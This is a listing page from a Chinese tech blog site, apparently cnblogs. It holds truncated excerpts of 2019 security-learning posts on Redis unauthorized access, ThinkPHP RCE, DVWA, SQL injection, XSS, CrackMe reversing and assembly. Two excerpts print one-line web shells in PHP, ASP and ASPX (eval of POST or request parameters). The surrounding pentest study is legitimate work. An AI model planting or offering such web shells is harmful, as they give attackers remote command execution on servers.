0

Redis未授权漏洞检测工具

Redis未授权检测小工具 使用方法 不写指定端口默认为 端口 ...

r0ckysec 发布于 2019-09-02 18:40 评论(0)阅读(28)
0

ThinkPHP5.0版本 远程命令执行漏洞GetShell

https://blog.csdn.net/Fly_hps/article/details/84954664 漏洞概况 ThinkPHP是一款国内流行的开源PHP框架,近日被爆出存在可能的远程代码执行漏洞,攻击者可向缓存文件内写入PHP代码,导致远程代码执行。虽然该漏洞利用需要有几个前提条件,但鉴于 ...

强壮的脸皮 发布于 2019-09-02 16:02 评论(0)阅读(48)
0

Redis未授权访问漏洞复现及修复方案

首先,第一个复现Redis未授权访问这个漏洞是有原因的,在 2019 07 24 的某一天,我同学的服务器突然特别卡,卡到连不上的那种,通过 top,free,netstat 等命令查看后发现,CPU占用200%,并且存在可疑进程,在很多目录下发现了可疑文件。经过排查后,确定为全盘感染的挖矿病毒,而 ...

r0ckysec 发布于 2019-09-02 00:20 评论(2)阅读(51)
0

API访问控制设计

References● OAuth 2.0 for native apps: https://datatracker.ietf.org/doc/rfc8252/ ● OAuth 2.0 for browser-based apps best current practice: https://dat... ...

PetterLiu 发布于 2019-09-01 22:34 评论(0)阅读(38)
0

DVWA之命令执行

一、命令执行漏洞 命令执行漏洞是指可以随意执行系统命令,属于高危漏洞之一,也属与代码执行范围内,好比说一句话木马<?php@eval($_POST['cmd']);?> 二、分类: 1.代买过滤不严或无过滤 2.系统漏洞造成的命令执行, bash破壳漏洞,该漏洞可以构造环境变量的值来执行具有攻击力的 ...

Seizer 发布于 2019-08-31 01:11 评论(0)阅读(26)
0

DVWA的搭建

DVWA的搭建 一、DVWA是什么? 一款渗透测试演练系统,俗称靶机。 二、如何搭建? Linux有成套的靶机,直接打开使用就可以,下面开始介绍Windows 下DVWA的搭建。 运行phpstudy 设置网站根目录 将DVWA源码放入 进入DVWA->config 修改你的数据库连接账户和密码, ...

Seizer 发布于 2019-08-31 01:02 评论(0)阅读(15)
0

逆向破解之160个CrackMe —— 021

CrackMe —— 021 160 CrackMe 是比较适合新手学习逆向破解的CrackMe的一个集合一共160个待逆向破解的程序 CrackMe:它们都是一些公开给别人尝试破解的小程序,制作 crackme 的人可能是程序员,想测试一下自己的软件保护技术,也可能是一位 cracker,想挑战一 ...

寂夜云 发布于 2019-08-30 14:48 评论(0)阅读(27)
0

linux 的常用命令(1)

1.关于ls [选项][目录名] -a 列出包括.a开头的隐藏文件的所有文件-A 通-a,但不列出"."和".."-l 列出文件的详细信息-c 根据ctime排序显示-t 根据文件修改时间排序 2.mv [选项] 源文件或目录 目录或多个源文件 | 移动或重命名文件 -b 覆盖前做备份 -f 如存在 ...

Fy丶Jianc 发布于 2019-08-30 11:35 评论(0)阅读(74)
0

简单的一句话木马(asp aspx php)

一句话木马: 1. #asp <%execute(request("pass"))%> 2. #php <?php eval($_POST[pass]);?> 3. #ASPX <% @Page Language="Jscript"%><%eval(Request.Item["pass"],"uns ...

inkblack 发布于 2019-08-29 16:52 评论(0)阅读(39)
0

逆向破解之160个CrackMe —— 020

CrackMe —— 020 160 CrackMe 是比较适合新手学习逆向破解的CrackMe的一个集合一共160个待逆向破解的程序 CrackMe:它们都是一些公开给别人尝试破解的小程序,制作 crackme 的人可能是程序员,想测试一下自己的软件保护技术,也可能是一位 cracker,想挑战一 ...

寂夜云 发布于 2019-08-29 01:15 评论(0)阅读(29)
0

堆叠注入

什么是堆叠注入? 顾名思义,堆叠注入就是将一堆sql语句叠加在一起执行,使用分号结束上一个语句再叠加其他语句一起执行。 题目 首先尝试闭合引号,并注释后面的内容。 发现没有报错,那就判断一下有多少列。 由此可以判断出有两列,接着判断回显位。 发现回显了过滤规则,select是被过滤的,还有一些注入常 ...

顾北清 发布于 2019-08-28 20:34 评论(0)阅读(16)
0

逆向破解之160个CrackMe —— 019

CrackMe —— 019 160 CrackMe 是比较适合新手学习逆向破解的CrackMe的一个集合一共160个待逆向破解的程序 CrackMe:它们都是一些公开给别人尝试破解的小程序,制作 crackme 的人可能是程序员,想测试一下自己的软件保护技术,也可能是一位 cracker,想挑战一 ...

寂夜云 发布于 2019-08-27 23:13 评论(0)阅读(19)
0

常用Http status code 如何记

一直记不住http常用的status code,最近思考可以这样想。http无非就是客户端和服务端之间请求连接交互嘛。结果要么成功,要么失败。 请求过程中,临时状态可以提示信息 -- Informational 1xx,成功了 -- Successful 2xx 失败了,或者客户端错误 -- Cli ...

CoderBaby 发布于 2019-08-27 21:03 评论(0)阅读(41)
0

逆向破解之160个CrackMe —— 018

CrackMe —— 018 160 CrackMe 是比较适合新手学习逆向破解的CrackMe的一个集合一共160个待逆向破解的程序 CrackMe:它们都是一些公开给别人尝试破解的小程序,制作 crackme 的人可能是程序员,想测试一下自己的软件保护技术,也可能是一位 cracker,想挑战一 ...

寂夜云 发布于 2019-08-27 00:02 评论(0)阅读(62)
0

汇编指令之STOS、REP

版权声明:本文为博主原创文章,转载请附上原文出处链接和本声明。23:28:13,23:28:19作者By 溺心与沉浮 博客园 STOS指令:讲Al/AX/EAX的值存储到[EDI]指定的内存单元 STOS BYTE PTR ES:[EDI] 简写为STOSB STOS WORD PTR ES:[ED ...

溺心与沉浮 发布于 2019-08-26 23:31 评论(0)阅读(34)
0

汇编指令之ADC、SBB、XCHG、MOVS指令

版权声明:本文为博主原创文章,转载请附上原文出处链接和本声明。2019-08-25,23:52:49作者By 溺心与沉浮 博客园 介绍完这些基础指令,后面就讲到汇编JCC指令了,我觉得介绍指令不应该只是简简单单的就介绍怎么用,汇编它其实也是高级语言,相信你读完我前面的文章就可以看到,我介绍PUSH、 ...

溺心与沉浮 发布于 2019-08-25 23:55 评论(0)阅读(50)
0

逆向破解之160个CrackMe —— 017

CrackMe —— 017 160 CrackMe 是比较适合新手学习逆向破解的CrackMe的一个集合一共160个待逆向破解的程序 CrackMe:它们都是一些公开给别人尝试破解的小程序,制作 crackme 的人可能是程序员,想测试一下自己的软件保护技术,也可能是一位 cracker,想挑战一 ...

寂夜云 发布于 2019-08-25 15:23 评论(0)阅读(42)
0

存储型XSS的发现经历和一点绕过思路

再次骚扰 某SRC提现额度竟然最低是两千,而已经有750的我不甘心呐,这不得把这2000拿出来嘛。 之后我就疯狂的挖这个站,偶然发现了一个之前没挖出来的点,还有个存储型XSS! 刚开始来到这个之前挖过但没挖出来的站,看了一下感觉这站没啥东西了啊,然后来到评论区又一次测试了一下 先简单测试一下 心态: ...

r0ckysec 发布于 2019-08-25 00:59 评论(0)阅读(57)
0

渗透之路基础 -- SQL注入

mysql注入(上) ​ 获取字段数:order by x 去临界值 ​ 获取数据库名:database() ​ 获取数据库版本:version() ​ information_schema : mysql5.0版本以上自带数据库,记录当前mysql下的所有数据库名,表名,列名。 ​ informa ...

r0ckysec 发布于 2019-08-25 00:49 评论(3)阅读(79)
0

第一篇博客就这么开始了?!稍微介绍一下。

先介绍一波 自我介绍,学习经历 学习历程 我是来自浙江,本科计算机科学与技术专业,大学期间一直热衷于网络安全和渗透测试,只可惜校内并没有这方面的教学,只能一步步的自学,疯狂踩坑。 记得我从大二下才开始自学网络安全,但是苦于我身边没有大佬带路,一直没找到门槛,这一路学的也是断断续续,中间停了好久。 直 ...

r0ckysec 发布于 2019-08-24 23:30 评论(0)阅读(49)